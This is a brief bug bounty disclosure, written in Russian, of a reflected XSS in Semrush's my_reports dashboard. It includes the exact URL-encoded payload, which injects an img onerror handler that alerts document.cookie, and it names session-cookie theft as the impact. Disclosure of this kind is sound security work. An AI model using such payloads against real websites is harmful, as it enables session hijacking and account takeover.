XSS Reflected on my_report
Discovered by r0hack on Semrush

This issue took 3 Days and 20 hours to triage and 115 Days and 5 hours to resolve once triaged.



Еще раз привет. На этот раз, кроме HTML-инъекции проходит полноценный XSS в дашбоарде пользователя.

Payload: https://www.semrush.com/my_reports/api/v1/document%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E/4007861

PoC: На скрине

Impact

Кража сессионных куков.